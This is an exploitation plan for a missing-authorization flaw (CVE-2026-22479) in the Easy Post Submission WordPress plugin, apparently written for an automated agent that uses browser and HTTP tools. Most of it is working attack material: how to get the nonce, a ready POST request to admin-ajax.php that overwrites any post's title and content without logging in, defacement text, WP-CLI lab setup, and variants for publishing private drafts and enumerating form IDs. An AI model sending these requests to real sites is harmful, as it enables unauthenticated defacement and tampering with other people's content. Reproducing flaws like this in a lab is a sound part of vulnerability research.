Detailed Exploitation Research Plan: CVE-2026-22479

1. Vulnerability Summary

The Easy Post Submission plugin (versions <= 2.4.0) contains a missing authorization vulnerability within its frontend AJAX handling logic. Specifically, the create_post function (associated with the rbsm_submit_post AJAX action) is accessible to unauthenticated users (wp_ajax_nopriv_rbsm_submit_post) to allow guest submissions. However, the function fails to properly validate that a user has permission to modify a post when a postId parameter is provided. This allows an unauthenticated attacker to overwrite the content, title, and metadata of any existing WordPress post by providing its ID.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: rbsm_submit_post
• HTTP Method: POST
• Authentication: None (Unauthenticated)
• Vulnerable Parameter: postId (used to target an existing post for modification)
• Preconditions:
  1. The plugin must be active.
  2. A valid nonce for the easy-post-submission action must be obtained.
  3. A "Submission Form" must exist (the plugin creates a default one during its "Quick Start" setup).

3. Code Flow

1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with action=rbsm_submit_post.
2. Hook Registration: In includes/client-ajax-handler.php, the constructor registers:

   add_action( 'wp_ajax_nopriv_rbsm_submit_post', [ $this, 'create_post' ] );
   

3. Data Sanitization: create_post calls $this->get_sanitized_submission_data().
4. Nonce Check: Inside get_sanitized_submission_data():
   • It retrieves $_POST['_nonce'].
   • It verifies it against self::$nonce (which is 'easy-post-submission').
   • It extracts postId from $_POST['postId'].
5. Vulnerable Sink: create_post uses the extracted postId to perform a wp_insert_post() or wp_update_post() operation. In version 2.4.0 and below, it fails to call current_user_can('edit_post', $postId) or verify that the guest user is the original author of the post being modified.

4. Nonce Acquisition Strategy

The plugin generates the nonce for the easy-post-submission action and localizes it for use in frontend forms.

1. Shortcode Identification: The plugin uses the shortcode [rb_submission_form] to display the submission form.
2. Setup: Create a public page containing this shortcode.
3. Navigation: Navigate to the page using browser_navigate.
4. Extraction: Use browser_eval to extract the nonce from the localized JavaScript object. The plugin typically localizes its parameters into the rbsm_params or rbsm_ajax_params object.
   • Target Variable: window.rbsm_params.nonce or window.rbSubmission.nonce.
   • Fallback: If the variable name is unknown, search the page source for the string "easy-post-submission".

5. Exploitation Strategy

1. Discover Form ID: The plugin requires a formId (referencing the rb_submission table). A default form is usually created during setup with ID 1.
2. Identify Target: Select a target Post ID (e.g., Post ID 1, usually the default "Hello world!" post).
3. Craft Payload:
   • action: rbsm_submit_post
   • _nonce: [EXTRACTED_NONCE]
   • postId: [TARGET_POST_ID]
   • title: Hacked by CVE-2026-22479
   • content: Your site has been modified due to missing authorization.
   • formId: 1
4. Execute: Send the request using the http_request tool.

Request Template:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=rbsm_submit_post&_nonce=[NONCE]&postId=1&title=Defaced&content=Vulnerable+Plugin&formId=1

6. Test Data Setup

1. Install Plugin: Ensure easy-post-submission version 2.4.0 is installed.
2. Trigger Setup: The plugin requires a "Setup Flag" to be set or the activation routine to run to create the rb_submission table.
   • wp eval "Easy_Post_Submission::get_instance()->activate_site();"
3. Create Submission Form:
   • wp db query "INSERT INTO wp_rb_submission (title, data) VALUES ('Default Form', '{}');"
4. Create Exploit Page:
   • wp post create --post_type=page --post_status=publish --post_title="Submit" --post_content='[rb_submission_form]'
5. Target Post: Ensure a post with ID 1 exists.

7. Expected Results

• The AJAX request should return a JSON success response: {"success":true,"data":...}.
• The post with the specified postId (e.g., ID 1) should have its title and content updated to the values provided in the exploit payload.

8. Verification Steps

1. Check Post Content: Use WP-CLI to verify the post was modified.
   • wp post get 1 --field=post_title
   • wp post get 1 --field=post_content
2. Check Status: Ensure the modification occurred even though the request was unauthenticated.

9. Alternative Approaches

• Status Manipulation: If the plugin allows setting post_status, attempt to change a private or draft post to publish.
• Form ID Enumeration: If form ID 1 does not exist, use a loop or SQL query to find a valid ID from the wp_rb_submission table.
• Custom Fields: If the post uses metadata, attempt to inject data via the customFieldsData parameter identified in get_sanitized_submission_data().